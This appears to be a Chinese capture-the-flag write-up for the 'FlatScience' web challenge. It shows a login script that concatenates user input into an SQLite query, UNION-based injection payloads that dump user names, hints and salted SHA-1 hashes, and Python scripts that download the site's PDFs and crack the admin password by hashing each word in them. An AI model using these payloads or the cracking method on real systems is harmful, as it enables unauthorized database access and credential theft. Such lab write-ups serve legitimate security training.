zoukankan      html  css  js  c++  java
  • FlatScience(sqlite3注入|python->读取PDF)

    进入login.php页面,F12后发现了

    按照文本的提示,我们get传递一下debug参数

    拿到login.php源码:

    <?php
    ob_start();
    ?>
    
    
    <?php
    if(isset($_POST['usr']) && isset($_POST['pw'])){
            $user = $_POST['usr'];
            $pass = $_POST['pw'];
    
            $db = new SQLite3('../fancy.db');
            $res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");
    
        if($res){
            $row = $res->fetchArray();
        }
        else{
            echo "<br>Some Error occourred!";
        }
    
        if(isset($row['id'])){
                setcookie('name',' '.$row['name'], time() + 60, '/');
                header("Location: /");
                die();
        }
    
    }
    
    if(isset($_GET['debug']))
    highlight_file('login.php');
    ?>

    审计代码得知数据库采用的是SQLite3,post参数没有过滤

    构造payload获取表名

    url解码得到:

    +CREATE+TABLE+Users(id+int+primary+key,name+varchar(255),password+varchar(255),hint+varchar(255))

    获取用户名

     usr='union select 1,group_concat(name) from Users--+ &pw=1

    获取密码

     usr='union select 1,group_concat(password) from Users--+ &pw=1

     得到admin的密码为:3fab54a50e770d830c0416df817567662a9dc85c

    查找hint字段

    usr='union select 1,group_concat(hint) from Users--+ &pw=1

    解码得到:

    | name   | hint                          |
    | ------ | ----------------------------- |
    | admin  | my fav word in my fav paper?! |
    | fritze | my love is…?                  |
    | hansi  | the password is password      |

    发现只能找到admin的密码了,线索是作者最爱的单词:

    shal(单词+Salz)=3fab54a50e770d830c0416df817567662a9dc85c

    使用前辈的脚本,下载pdf并分析出flag

    #下载pdf
    import urllib.request
    import re
    import os
    
    
    # open the url and read
    def getHtml(url):
        page = urllib.request.urlopen(url)
        html = page.read()
        page.close()
        return html
    
    def getUrl(html):
        reg = r'(?:href|HREF)="?((?:http://)?.+?.pdf)'
        url_re = re.compile(reg)
        url_lst = url_re.findall(html.decode('utf-8'))
        return(url_lst)
    
    def getFile(url):
        file_name = url.split('/')[-1]
        u = urllib.request.urlopen(url)
        f = open(file_name, 'wb')
    
        block_sz = 8192
        while True:
            buffer = u.read(block_sz)
            if not buffer:
                break
    
            f.write(buffer)
        f.close()
        print ("Sucessful to download" + " " + file_name)
    
    #指定网页
    root_url = ['http://220.249.52.133:35791/1/2/5/',
                'http://220.249.52.133:35791/']
    
    raw_url = ['http://220.249.52.133:35791/1/2/5/index.html',
                'http://220.249.52.133:35791/index.html'
               ]
    #指定目录
    os.mkdir('ldf_download')
    os.chdir(os.path.join(os.getcwd(), 'ldf_download'))
    for i in range(len(root_url)):
        print("当前网页:",root_url[i])
        html = getHtml(raw_url[i])
        url_lst = getUrl(html)
    
        for url in url_lst[:]:
            url = root_url[i] + url
            getFile(url)
    #分析脚本
    from
    io import StringIO #python3 from pdfminer.pdfpage import PDFPage from pdfminer.converter import TextConverter from pdfminer.converter import PDFPageAggregator from pdfminer.layout import LTTextBoxHorizontal, LAParams from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter import sys import string import os import hashlib import importlib import random from urllib.request import urlopen from urllib.request import Request def get_pdf(): return [i for i in os.listdir("./ldf_download/") if i.endswith("pdf")] def convert_pdf_to_txt(path_to_file): rsrcmgr = PDFResourceManager() retstr = StringIO() laparams = LAParams() device = TextConverter(rsrcmgr, retstr, laparams=laparams) fp = open(path_to_file, 'rb') interpreter = PDFPageInterpreter(rsrcmgr, device) password = "" maxpages = 0 caching = True pagenos=set() for page in PDFPage.get_pages(fp, pagenos, maxpages=maxpages, password=password,caching=caching, check_extractable=True): interpreter.process_page(page) text = retstr.getvalue() fp.close() device.close() retstr.close() return text def find_password(): pdf_path = get_pdf() for i in pdf_path: print ("Searching word in " + i) pdf_text = convert_pdf_to_txt("./ldf_download/"+i).split(" ") for word in pdf_text: sha1_password = hashlib.sha1(word.encode('utf-8')+'Salz!'.encode('utf-8')).hexdigest() if (sha1_password == '3fab54a50e770d830c0416df817567662a9dc85c'): print ("Find the password :" + word) exit() if __name__ == "__main__": find_password()

    得到admin的密码,登录admin.php页面获取flag

     

  • 相关阅读:
    JTAG的SWD接线方式
    Qt のEXecl
    人脸识别
    Qt实现基本QMainWindow主窗口程序
    Qt学习之路MainWindow学习过程中的知识点
    QT_FORWARD_DECLARE_CLASS
    标准的并发控制实现
    C++ DFS
    C# 互操作(一) 编写一个C++ COM组件
    Socket使用SOAP调用WCF
  • 原文地址:https://www.cnblogs.com/luocodes/p/13864124.html
Copyright © 2011-2022 走看看